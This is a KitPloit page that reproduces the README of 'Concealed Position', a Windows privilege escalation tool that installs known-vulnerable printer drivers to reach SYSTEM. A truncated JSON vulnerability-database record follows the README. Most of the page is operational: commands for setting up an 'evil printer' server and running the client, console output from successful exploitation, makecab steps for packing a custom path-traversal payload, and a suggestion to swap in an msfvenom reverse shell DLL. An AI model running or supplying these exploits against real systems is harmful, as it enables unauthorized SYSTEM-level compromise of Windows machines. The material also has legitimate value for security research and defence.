[](<https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg>)
Concealed Position is a local [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> "privilege escalation" ) attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the _as designed_ package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with [known vulnerabilities](<https://www.kitploit.com/search/label/Known%20Vulnerabilities> "known vulnerabilities" ) which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.
**What exploits are available**
Concealed Position offers four exploits - all with equally dumb names:
* ACIDDAMAGE - [CVE-2021-35449](<https://nvd.nist.gov/vuln/detail/CVE-2021-35449> "CVE-2021-35449" ) \- Lexmark Universal Print Driver LPE
* RADIANTDAMAGE - [CVE-2021-38085](<https://nvd.nist.gov/vuln/detail/CVE-2021-38085> "CVE-2021-38085" ) \- Canon TR150 Print Driver LPE
* POISONDAMAGE - [CVE-2019-19363](<https://nvd.nist.gov/vuln/detail/CVE-2019-19363> "CVE-2019-19363" ) \- Ricoh PCL6 Print Driver LPE
* SLASHINGDAMAGE - [CVE-2020-1300](<https://nvd.nist.gov/vuln/detail/CVE-2020-1300> "CVE-2020-1300" ) \- Windows Print Spooler LPE
The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.
**But which exploit should I use?!**
Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.
**How does it work?**
Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:
Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver
Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage
Stage 3: Add a local printer (exploitation stage)
client: Add printer
It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.
**Is this a Windows vulnerability?**
Arguably, yes. The driver store is a ["trusted collection of ... third-party driver packages"](<https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store> "trusted collection of ... third-party driver packages" ) that requires administrator access to modify. Using `GetPrinterDriver` a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.
Microsoft seemed to agree when they issued [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481> "CVE-2021-34481" ).
Although... it's arguable that this is simply a feature of the system and not a [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> "vulnerability" ) at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.
**Which verions of Windows are affected by CVE-2021-34481?**
At least Windows 8.1 and above.
**How do I use these tools?**
Simple! So simple there will be many paragraphs to describe it!
**CP Server**
First, let's look at cp_server's command line options:
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!
CLI options:
-h, --help Display the help message
-e, --exploit arg The exploit to use
-c, --cabs arg (=.\cab_files) The location of the cabinet files
Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE
SLASHINGDAMAGE
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
Above you can see the server requires two options:
1. The exploit to configure the printer for
2. A path to this repositories cab_files (.\cab_files\ is the default)
For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!
[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
And that's it, you'll see a new printer on your system:
PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer
Name ComputerName Type DriverName PortName Shared Publishe
d
---- ------------ ---- ---------- -------- ------ --------
ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False
CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False
OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False
Microsoft XPS Document Writer Local Microsoft XPS Document... PORTPROMPT: False False
Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False
Fax Local Microsoft Shared Fax D... SHRFAX: False False
PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
Note that there is one manual step that `cp_server` prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!
The process for using `SLASHINGDAMAGE` is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and _then_ you'll still need to follow a couple of manual steps and reboot.
**CP Client**
The client is similarly easy to use. Let's look at it's command line options:
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!
CLI options:
-h, --help Display the help message
-r, --rhost arg The remote evil printer address
-n, --name arg The remote evil printer name
-e, --exploit arg The exploit to use
-l, --local No remote printer. Local attack only.
-d, --dll arg Path to user provided DLL to execute.
Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE
First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.
`cp_client` has two modes: remote and local. The remote option is the most interesting because it adds the [vulnerable driver](<https://www.kitploit.com/search/label/Vulnerable%20Driver> "vulnerable driver" ) to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:
1. The exploit I want to use
2. The evil printer IP address
3. The name of the evil shared printer
Like this!
C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_ | ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!
[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!
That's it! To execute a local only attack, you just need to provide the exploit:
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!
[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
**Why doesn't the client have a SLASHINGDAMAGE option?**
`SLASHINGDAMAGE` doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:
echo “evil.dll” “../../evil.dll” > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab
It's probably important to know that the version of `SLASHINGDAMAGE` in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.
**Pull Requests and Bugs**
Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.
**Other things**
One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).
**[Download Concealed_Position](<https://github.com/jacob-baines/concealed_position> "Download Concealed_Position" )**
{"id": "KITPLOIT:1358590931647264988", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool", "description": "[](<https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg>)\n\n \n\n\nConcealed Position is a local [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) attack against Windows using the concept of \"Bring Your Own Vulnerability\". Specifically, Concealed Position (CP) uses the _as designed_ package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with [known vulnerabilities](<https://www.kitploit.com/search/label/Known%20Vulnerabilities> \"known vulnerabilities\" ) which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.\n\n \n\n\n**What exploits are available** \n\n\nConcealed Position offers four exploits - all with equally dumb names:\n\n * ACIDDAMAGE - [CVE-2021-35449](<https://nvd.nist.gov/vuln/detail/CVE-2021-35449> \"CVE-2021-35449\" ) \\- Lexmark Universal Print Driver LPE\n * RADIANTDAMAGE - [CVE-2021-38085](<https://nvd.nist.gov/vuln/detail/CVE-2021-38085> \"CVE-2021-38085\" ) \\- Canon TR150 Print Driver LPE\n * POISONDAMAGE - [CVE-2019-19363](<https://nvd.nist.gov/vuln/detail/CVE-2019-19363> \"CVE-2019-19363\" ) \\- Ricoh PCL6 Print Driver LPE\n * SLASHINGDAMAGE - [CVE-2020-1300](<https://nvd.nist.gov/vuln/detail/CVE-2020-1300> \"CVE-2020-1300\" ) \\- Windows Print Spooler LPE\n\nThe exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.\n\n \n**But which exploit should I use?!** \n\n\nProbably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.\n\n \n**How does it work?** \n\n\nConcealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:\n \n \n Step 1: Stage the driver in the driver store \n client to server: GetPrinterDriver \n server to client: Response with driver \n \n Stage 2: Install the driver from the driver store \n client: InstallPrinterDriverFromPackage \n \n Stage 3: Add a local printer (exploitation stage) \n client: Add printer \n \n\nIt is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.\n\n \n**Is this a Windows vulnerability?** \n\n\nArguably, yes. The driver store is a [\"trusted collection of ... third-party driver packages\"](<https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store> \"trusted collection of ... third-party driver packages\" ) that requires administrator access to modify. Using `GetPrinterDriver` a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.\n\nMicrosoft seemed to agree when they issued [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481> \"CVE-2021-34481\" ).\n\nAlthough... it's arguable that this is simply a feature of the system and not a [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.\n\n \n**Which verions of Windows are affected by CVE-2021-34481?** \n\n\nAt least Windows 8.1 and above.\n\n \n**How do I use these tools?** \n\n\nSimple! So simple there will be many paragraphs to describe it!\n\n \n**CP Server** \n\n\nFirst, let's look at cp_server's command line options:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_server.exe \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| || _____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| server! \n \n CLI options: \n -h, --help Display the help message \n -e, --exploit arg The exploit to use \n -c, --cabs arg (=.\\cab_files) The location of the cabinet files \n \n Exploits available: \n ACIDDAMAGE \n POISONDAMAGE \n RADIANTDAMAGE \n SLASHINGDAMAGE \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nAbove you can see the server requires two options:\n\n 1. The exploit to configure the printer for\n 2. A path to this repositories cab_files (.\\cab_files\\ is the default)\n\nFor example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_server.exe -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| server! \n \n [+] Creating temporary space... \n [+] Expanding .\\cab_files\\ACIDDAMAGE\\LMUD1o40.cab \n [+] Pushing into the driver store \n [+] Cleaning up tmp space \n [+] Installing print driver \n [+] Driver installed! \n [+] Installing shared printer \n [+] Shared printer installed! \n [+] Automation Done. \n [!] IMPORTANT MANUAL STEPS! \n [0] In Advanced Sharing Settings, Turn off password protected sharing. \n [1] Ready to go! \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nAnd that's it, you'll see a new printer on your system:\n \n \n PS C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> Get-Printer \n \n Name ComputerName Type DriverName PortName Shared Publishe \n d \n ---- ------------ ---- ---------- -------- ------ -------- \n ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False \n CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False \n OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False \n Microsoft XPS Document Writer Local Microsoft XPS Document... PORTPROMPT: False False \n Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False \n Fax Local Microsoft Shared Fax D... SHRFAX: False False \n \n \n PS C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\nNote that there is one manual step that `cp_server` prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the \"Advanced Sharing Settings\" -> \"Turn off password protected sharing\". You'll have to do that yourself!\n\nThe process for using `SLASHINGDAMAGE` is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and _then_ you'll still need to follow a couple of manual steps and reboot.\n\n \n**CP Client** \n\n\nThe client is similarly easy to use. Let's look at it's command line options:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_client.exe \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| || _____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n CLI options: \n -h, --help Display the help message \n -r, --rhost arg The remote evil printer address \n -n, --name arg The remote evil printer name \n -e, --exploit arg The exploit to use \n -l, --local No remote printer. Local attack only. \n -d, --dll arg Path to user provided DLL to execute. \n \n Exploits available: \n ACIDDAMAGE \n POISONDAMAGE \n RADIANTDAMAGE \n \n\nFirst, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.\n\n`cp_client` has two modes: remote and local. The remote option is the most interesting because it adds the [vulnerable driver](<https://www.kitploit.com/search/label/Vulnerable%20Driver> \"vulnerable driver\" ) to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:\n\n 1. The exploit I want to use\n 2. The evil printer IP address\n 3. The name of the evil shared printer\n\nLike this!\n \n \n C:\\Users\\albinolobster\\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_ | ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n [+] Checking if driver is already installed \n [-] Driver is not available. \n [+] Call back to evil printer @ \\\\10.0.0.9\\ACIDDAMAGE \n [+] Staging driver in driver store \n [+] Installing the staged driver \n [+] Driver installed! \n [+] Starting AcidDamage \n [+] Checking if C:\\ProgramData\\Lexmark Universal v2\\ exists \n [-] Target directory doesn't exist. Trigger install. \n [+] Installing printer \n [+] Read in C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl \n [+] Searching file contents \n [+] Updating file contents \n [+] Dropping updated gpl \n [+] Dropping Dll.dll to disk \n [+] Staging dll in c:\\tmp \n [+] Installing printer \n [!] Mucho success! \n \n\nThat's it! To execute a local only attack, you just need to provide the exploit:\n \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin>cp_client.exe -l -e ACIDDAMAGE \n _______ _______ __ _ _______ _______ _______ ___ _______ ______ \n | || || | | || || || _ || | | || | \n | || _ || |_| || || ___|| |_| || | | ___|| _ | \n | || | | || || || |___ | || | | |___ | | | | \n | _|| |_| || _ || _|| ___|| || |___ | ___|| |_| | \n | |_ | || | | || |_ | |___ | _ || || |___ | | \n |_______||_______||_| |__||_______||_______||__| |__||_______||_______||______| \n _______ _______ _______ ___ _______ ___ _______ __ _ \n | || || || | | || | | || | | | \n | _ || _ || _____|| | |_ _|| | | _ || |_| | \n | |_| || | | || |_____ | | | | | | | | | || | \n | ___|| |_| ||_____ || | | | | | | |_| || _ | \n | | | | _____| || | | | | | | || | | | \n |___| |_______||_______||___| |___| |___| |_______||_| |__| client! \n \n [+] Checking if driver is already installed \n [+] Driver installed! \n [+] Starting AcidDamage \n [+] Checking if C:\\ProgramData\\Lexmark Universal v2\\ exists \n [-] Target directory doesn't exist. Trigger install. \n [+] Installing printer \n [+] Read in C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl \n [+] Searching file contents \n [+] Updating file contents \n [+] Dropping updated gpl \n [+] Dropping Dll.dll to disk \n [+] Staging dll in c:\\tmp \n [+] Installing printer \n [!] Mucho success! \n \n C:\\Users\\albinolobster\\concealed_position\\build\\x64\\Release\\bin> \n \n\n \n**Why doesn't the client have a SLASHINGDAMAGE option?** \n\n\n`SLASHINGDAMAGE` doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:\n \n \n echo \u201cevil.dll\u201d \u201c../../evil.dll\u201d > files.txt \n makecab /f files.txt \n move disk1/1.cab exploit.cab \n \n\nIt's probably important to know that the version of `SLASHINGDAMAGE` in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\\result.txt file.\n\n \n**Pull Requests and Bugs** \n\n\nDo you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.\n\n \n**Other things** \n\n\nOne thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).\n\n \n \n\n\n**[Download Concealed_Position](<https://github.com/jacob-baines/concealed_position> \"Download Concealed_Position\" )**\n", "published": "2021-09-18T11:30:00", "modified": "2021-09-18T11:30:00", "epss": [{"cve": "CVE-2019-19363", "epss": 0.00071, "percentile": 0.29159, "modified": "2023-05-29"}, {"cve": "CVE-2020-1300", "epss": 0.05488, "percentile": 0.92029, "modified": "2023-05-29"}, {"cve": "CVE-2021-34481", "epss": 0.00756, "percentile": 0.78409, "modified": "2023-05-23"}, {"cve": "CVE-2021-35449", "epss": 0.00114, "percentile": 0.43732, "modified": "2023-05-23"}, {"cve": "CVE-2021-38085", "epss": 0.00053, "percentile": 0.18875, "modified": "2023-05-23"}], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "http://www.kitploit.com/2021/09/concealed-position-bring-your-own-print.html", "reporter": "KitPloit", "references": ["https://github.com/jacob-baines/concealed_position"], "cvelist": ["CVE-2019-19363", "CVE-2020-1300", "CVE-2021-34481", "CVE-2021-35449", "CVE-2021-38085"], "immutableFields": [], "lastseen": "2023-05-30T14:45:21", "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1058"]}, {"type": "cnvd", "idList": ["CNVD-2022-10026"]}, {"type": "cve", "idList": ["CVE-2019-19008", "CVE-2019-19363", "CVE-2020-1300", "CVE-2021-34481", "CVE-2021-35449", "CVE-2021-38085"]}, {"type": "exploitdb", "idList": ["EDB-ID:47962", "EDB-ID:48036"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CCA4761A63552664BBDE027DD8AD1FAE"]}, {"type": "githubexploit", "idList": ["5E52E412-B5BA-54D6-92C1-F70C151A8199"]}, {"type": "hivepro", "idList": ["HIVEPRO:1C413EFAC97AED19F9E35574668008F9"]}, {"type": "jvn", "idList": ["JVN:15697526"]}, {"type": "kaspersky", "idList": ["KLA11806", "KLA11807", "KLA12231", "KLA12246"]}, {"type": "krebs", "idList": ["KREBS:AE87E964E683A56CFE4E51E96F3530AD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-RICOH_DRIVER_PRIVESC-"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1300", "MS:CVE-2021-34481"]}, {"type": "mskb", "idList": ["KB5005030", "KB5005031", "KB5005033", "KB5005040", "KB5005043", "KB5005076", "KB5005088", "KB5005089", "KB5005090", "KB5005094", "KB5005095", "KB5005099", "KB5005106", "KB5005606", "KB5005607", "KB5005613", "KB5005615", "KB5005618", "KB5005623", "KB5005627", "KB5005633"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JUN_4557957.NASL", "SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4561608.NASL", 